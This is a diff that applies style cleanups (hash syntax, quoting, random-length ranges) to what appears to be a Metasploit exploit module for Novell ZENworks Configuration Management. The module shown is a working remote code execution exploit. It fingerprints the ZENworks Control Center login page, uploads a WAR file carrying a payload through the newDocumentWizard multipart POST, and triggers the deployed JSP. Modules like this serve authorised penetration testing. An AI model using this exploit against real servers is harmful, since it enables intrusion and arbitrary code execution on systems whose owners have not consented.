@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
-  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+  HttpFingerprint = { pattern: [ /Apache-Coyote/ ] }
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
@@ -38,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]
         ],
         'Privileged' => false,
-        'Platform' => %w{linux win},
         'Targets' => [
           [
             'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',
@@ -78,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => "/zenworks/jsp/fw/internal/Login.jsp"
+      'uri' => '/zenworks/jsp/fw/internal/Login.jsp'
     })
 
     if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/
@@ -90,10 +89,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Generate the WAR containing the EXE containing the payload
-    app_base = rand_text_alphanumeric(4 + rand(4))
-    jsp_name = rand_text_alphanumeric(8 + rand(8))
+    app_base = rand_text_alphanumeric(rand(4..7))
+    jsp_name = rand_text_alphanumeric(rand(8..15))
 
-    war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s
+    war_data = payload.encoded_war(app_name: app_base, jsp_name: jsp_name).to_s
 
     print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...")
 
@@ -109,16 +108,16 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       {
         'method' => 'POST',
-        'uri' => "/zenworks/jsp/index.jsp?pageid=newDocumentWizard",
+        'uri' => '/zenworks/jsp/index.jsp?pageid=newDocumentWizard',
         'ctype' => "multipart/form-data; boundary=#{boundary}",
         'data' => data
       }
     )
 
     if res and res.code == 302
-      print_status("Upload finished, waiting 20 seconds for payload deployment...")
+      print_status('Upload finished, waiting 20 seconds for payload deployment...')
     else
-      fail_with(Failure::Unknown, "Failed to upload payload")
+      fail_with(Failure::Unknown, 'Failed to upload payload')
     end
 
     # Wait to ensure the uploaded war is deployed
@@ -127,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")
     send_request_cgi({
       'uri' => normalize_uri(app_base, "#{jsp_name}.jsp"),
-      'method' => 'GET',
+      'method' => 'GET'
     })
   end
 end
